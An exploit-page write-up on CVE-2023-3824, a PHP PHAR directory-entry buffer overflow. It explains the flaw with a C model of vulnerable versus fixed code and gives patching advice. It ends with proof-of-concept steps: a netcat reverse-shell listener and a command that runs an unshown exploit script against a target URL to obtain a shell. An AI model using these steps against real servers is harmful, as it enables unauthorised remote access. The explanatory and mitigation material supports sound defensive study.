## https://sploitus.com/exploit?id=36B375A7-A530-57D3-8991-D4671A14F8AA
# About
CVE-2023-3824 is a critical memory-safety vulnerability in PHP's PHAR extension, affecting PHP 8.0.x before 8.0.30, 8.1.x before 8.1.22, and 8.2.x before 8.2.8. It is caused by **insufficient length checking** while reading PHAR directory entries: when PHP code lists a directory inside an archive through the `phar://` stream wrapper (`opendir()`, `scandir()`, `readdir()`, `DirectoryIterator` and similar), the phar directory-stream read routine (`phar_dir_read()` in `ext/phar/dirstream.c`) copies each entry name into a fixed-size `php_stream_dirent` without bounding the copy by the size of its `d_name` field. An entry name longer than that field, which an attacker controls when they supply the archive, overruns the buffer.
## Exploitation Overview
- **Stack Buffer Overflow**: The `php_stream_dirent` being filled in lives on the caller's stack, so a crafted PHAR whose directory listing contains an over-long entry name overwrites memory adjacent to that structure. Because the copy is still bounded by the caller's read size, the write past the structure is short rather than arbitrary-length.
- **Memory Corruption**: The overflow corrupts neighbouring stack data; with stack protectors enabled the most likely observable result is a crash of the PHP worker (denial of service).
- **Remote Code Execution**: The CVE text lists RCE as a potential outcome, which is why the issue is rated critical. Turning the short, attacker-controlled overwrite into code execution would additionally require defeating stack canaries and ASLR, so treat RCE as possible but unproven, not as a given.
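To make the length-check flaw concrete, here is a scaled-down C model of the two shapes of the directory-read routine, added for this page; it is not PHP's source and not code from the PoC repository. The pre-fix shape bounds the copy by the caller's read size (the size of the whole dirent) and stores the terminator one byte too far; the patched shape bounds the copy by the `d_name` field and terminates in place. The 64-byte `d_name`, the guard region standing in for neighbouring stack data, and the entry names are constructed for the demo; PHP's real field is `MAXPATHLEN` bytes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Scaled-down stand-in for php_stream_dirent, which the caller keeps on its
 * stack. PHP's real d_name is MAXPATHLEN bytes; 64 keeps the demo small. */
#define D_NAME_LEN 64
#define GUARD_LEN  16

typedef struct {
    char d_name[D_NAME_LEN];
    unsigned char d_type;
} dirent_model;

static size_t min_sz(size_t a, size_t b) { return a < b ? a : b; }

/* Vulnerable shape: the copy is bounded by `count`, the caller's read size
 * (the size of the whole dirent), not by d_name, and the terminator goes to
 * to_read + 1. `key` is the entry name taken from the archive. Writes go
 * through a char pointer, as in PHP's stream read API. */
static long dir_read_vulnerable(char *buf, size_t count, const char *key, size_t key_len)
{
    size_t to_read = min_sz(key_len, count);
    if (to_read == 0 || count < sizeof(dirent_model))
        return -1;
    memset(buf, 0, sizeof(dirent_model));
    memcpy(buf + offsetof(dirent_model, d_name), key, to_read);
    buf[offsetof(dirent_model, d_name) + to_read + 1] = '\0';
    return (long)sizeof(dirent_model);
}

/* Fixed shape: bound the copy by the d_name field itself, leave room for
 * the terminator, and store the terminator at to_read. */
static long dir_read_fixed(char *buf, size_t count, const char *key, size_t key_len)
{
    size_t to_read = min_sz(key_len, D_NAME_LEN - 1);
    if (to_read == 0 || count < sizeof(dirent_model))
        return -1;
    memset(buf, 0, sizeof(dirent_model));
    memcpy(buf + offsetof(dirent_model, d_name), key, to_read);
    buf[offsetof(dirent_model, d_name) + to_read] = '\0';
    return (long)sizeof(dirent_model);
}

/* Constructed entry name: `len` bytes of 'A'. dst must hold len + 1 bytes. */
static void make_name(char *dst, size_t len)
{
    memset(dst, 'A', len);
    dst[len] = '\0';
}

/* Simulate the caller's frame: the dirent followed by a guard region that
 * stands in for whatever the compiler placed next to it. Returns how many
 * guard bytes the read overwrote (0 means no overflow). */
static size_t guard_bytes_clobbered_for_len(size_t name_len, int use_fixed)
{
    char name[256];
    char frame[sizeof(dirent_model) + GUARD_LEN];
    size_t i, clobbered = 0;

    make_name(name, name_len);
    memset(frame, 'G', sizeof frame);
    if (use_fixed)
        dir_read_fixed(frame, sizeof(dirent_model), name, name_len);
    else
        dir_read_vulnerable(frame, sizeof(dirent_model), name, name_len);

    for (i = sizeof(dirent_model); i < sizeof frame; i++)
        if (frame[i] != 'G')
            clobbered++;
    return clobbered;
}

/* Length of the name the fixed routine hands back: truncated and terminated. */
static size_t fixed_name_length_for_len(size_t name_len)
{
    char name[256];
    char frame[sizeof(dirent_model) + GUARD_LEN];

    make_name(name, name_len);
    memset(frame, 'G', sizeof frame);
    dir_read_fixed(frame, sizeof(dirent_model), name, name_len);
    return strlen(frame + offsetof(dirent_model, d_name));
}

int main(void)
{
    printf("9-byte name,   vulnerable: %zu guard bytes clobbered\n", guard_bytes_clobbered_for_len(9, 0));
    printf("64-byte name,  vulnerable: %zu guard bytes clobbered\n", guard_bytes_clobbered_for_len(64, 0));
    printf("199-byte name, vulnerable: %zu guard bytes clobbered\n", guard_bytes_clobbered_for_len(199, 0));
    printf("199-byte name, fixed:      %zu guard bytes clobbered\n", guard_bytes_clobbered_for_len(199, 1));
    printf("fixed d_name length for 199-byte name: %zu\n", fixed_name_length_for_len(199));
    return 0;
}
```

Two things the model shows that the prose does not: a name exactly as long as `d_name` already spills one byte past the structure because of the `to_read + 1` terminator, and even a much longer name only reaches a byte or two beyond the dirent because `count` caps the copy, which is why a crash is the realistic outcome and reliable code execution is hard.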
## Exploit Example
The attack involves getting a vulnerable PHP application to read the directory listing of a malicious PHAR file. The precondition is an application that opens attacker-supplied archives through the `phar://` wrapper, for example an upload handler that lists or extracts the uploaded archive, or any code path where the attacker controls the beginning of a path passed to a filesystem function and can therefore inject a `phar://` prefix. Merely storing the upload on disk does not trigger the bug; the vulnerable read happens when the archive's entries are enumerated.
A proof-of-concept for this vulnerability consists of a PHAR whose directory listing contains an entry name longer than the `d_name` buffer, which triggers the overflow when the entries are read. Exploitation therefore requires specific conditions (an application that processes untrusted PHARs as directories), but because PHP-based web applications commonly expose such paths, and because the CVE rates the outcome up to RCE, it should be treated as a severe issue.
## Mitigation
- **Update PHP**: The fix is to update PHP to 8.0.30, 8.1.22, or 8.2.8 or later, which include the corrected length check. Check the running interpreter with `php -v`, and confirm the web worker (php-fpm or mod_php) uses the same binary as the CLI.
- **Avoid Untrusted PHAR Files**: Do not open attacker-supplied archives as directories, and reject `phar://` in any user-controlled path. Where the application does not need the wrapper at all, disable it with `stream_wrapper_unregister('phar')`. Note that `phar.readonly=1` only blocks creating and modifying archives; it does not prevent reading them and so does not mitigate this bug.
NVD rates the vulnerability critical (CVSS v3.1 base score 9.8) because the potential outcome is full compromise of the PHP worker. Keeping PHP updated is the only complete fix.
# POC
Run reverse shell listener:
```bash
nc -lvnp local_port   # traditional/GNU netcat
# with OpenBSD netcat use: nc -lvn local_port
```
Then run POC:
```bash
bash cve-2023-3824.sh remote_url local_ip local_port
```
* _remote_url_ is the URL of the vulnerable PHP endpoint that accepts and processes the archive, e.g. `https://wp.example.com/form-uploader.php`
* _local_ip_ is the attacker machine's IP address, which the target must be able to reach
* _local_port_ is the port the listener above is bound to
If the exploit succeeds, you get a shell running as the user the PHP worker runs as (typically `www-data` or `apache`), not as root. The script itself is not reproduced on this page: read `cve-2023-3824.sh` in full before running it, and run it only from a disposable machine against systems you are authorised to test.
---
inspired by ::PerfectForms::